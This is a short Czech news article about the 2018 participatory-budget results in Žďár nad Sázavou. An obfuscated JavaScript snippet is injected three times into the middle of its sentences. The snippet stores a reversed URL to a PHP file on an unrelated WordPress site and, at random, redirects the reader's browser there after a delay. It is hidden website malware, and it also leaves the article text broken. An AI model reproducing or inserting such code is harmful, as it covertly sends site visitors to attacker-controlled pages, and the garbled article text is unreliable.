Rainbow page separator

V participativním rozpočtu vyhrály úpravy ploch v sídlištích

Čtvrtek, 16. listopadu 2017

Žďár nad Sázavou / Dva projekty do maximální výše tři sta tisíc korun na jeden uspěly v participativním rozpočtu pro rok 2018. Lidé přidělili nejvíce hlasů obnově dětského hřiště uvnitř sídliště v ulici Dolní (218 hlasů) a revitalizaci vnitrobloku v Palachově ulici 11-23 (155 hlasů). Pro celkem devět projektů hlasovalo 551 lidí.
Pro rok 2018 a v pořadí druhé kolo participativního rozpočtu žďárští zastupitelé vyčlenili finanční částku ve výši 600 tisíc korun – stejně jako v le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošním pilotním ročníku. Maximální částka příspěvku na jeden podpořený projekt byla z původních 150 tisíc korun zdvojnásobena na 300 tisíc.
Z le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošních čtyř projektů je dokončena obnova pítka v atriu za obchodními domy na náměstí a probíhají terénní úpravy ve Farských humnech. Do konce roku by se mělo stihnout i obnovení vstupu do úvozu na Klafaru a na příští rok bylo po dohodě s předkladateli odloženo oplocení bývalé vodárny, neboť měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to žádá o dotaci na rekonstrukci budovy a v případě úspěchu by bylo možné obě akce spojit.